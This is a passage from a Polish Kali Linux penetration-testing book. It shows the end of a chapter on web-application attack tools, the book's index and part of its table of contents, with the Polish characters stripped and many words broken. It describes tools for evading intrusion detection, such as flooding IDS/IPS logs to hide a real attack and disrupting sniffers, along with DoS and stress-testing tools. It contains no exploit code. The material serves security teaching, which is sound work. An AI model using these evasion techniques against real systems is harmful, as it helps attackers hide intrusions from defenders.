SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Spis tre ci
4
Rozdzia 2 Rekonesans 51
Zadania rekonesansu 52Rozpoznanie wst pne 53
Strona internetowa firmy 53roacuted a przechowuj ce historyczne wersje witryn internetowych 54
Regional Internet Registries czyli regionalni administratorzy adresoacutew IP 57System EDGAR 57Zasoby serwisoacutew spo eczno ciowych 58Zaufanie 59Oferty pracy 59Lokalizacja 60Wyszukiwarka Shodan 60Google hacking 61GHDB czyli Google Hacking Database 63Badanie zasoboacutew sieci komputerowych 65Rekonesans z wykorzystaniem protoko u ICMP 69Rekonesans z wykorzystaniem serweroacutew DNS 71Nmap 76FOCA mdash wyszukiwanie i analiza metadanych 83
Podsumowanie 89
Rozdzia 3 Ataki na serwery aplikacji internetowych 91
Wyszukiwanie podatno ci i luk w zabezpieczeniach 92Webshag 92Skipfish 95ProxyStrike 98Vega 101Owasp-Zap 105Websploit 112
Wykorzystywanie znalezionych luk w zabezpieczeniach (exploity) 113Metasploit 113w3af 120
Wykorzystywanie luk w zabezpieczeniach systemoacutew poczty elektronicznej 123Ataki typu brute-force 125
Hydra 125DirBuster 128WebSlayer 131
amanie hase 137John the Ripper 137
Ataki typu man-in-the-middle 139SSLStrip 140
Podsumowanie 145
Kup książkę Poleć książkę
Spis tre ci
5
Rozdzia 4 Ataki na klienty aplikacji internetowych 147
In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149
Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162
Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169
Has a w systemie Windows 171Has a w systemie Linux 173
Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185
Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191
Podsumowanie 191
Rozdzia 5 Ataki na metody uwierzytelniania 193
Ataki na zarz dzanie sesjami 195Clickjacking 196
Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198
Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217
Wstrzykiwanie kodu SQL 218sqlmap 221
Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224
Techniki XSS cookie stealing i Authentication hijacking 225
Kup książkę Poleć książkę
Spis tre ci
6
Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229
Podsumowanie 229
Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231
BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255
THX-SSL-DOS 257Scapy 259Slowloris 261
LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266
DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270
Podsumowanie 270
Rozdzia 7 Przeciwdzia anie i zapobieganie 271
Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277
Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281
Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284
Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287
Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295
Podsumowanie 300
Kup książkę Poleć książkę
Spis tre ci
7
Rozdzia 8 Tworzenie raportoacutew ko cowych 301
Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307
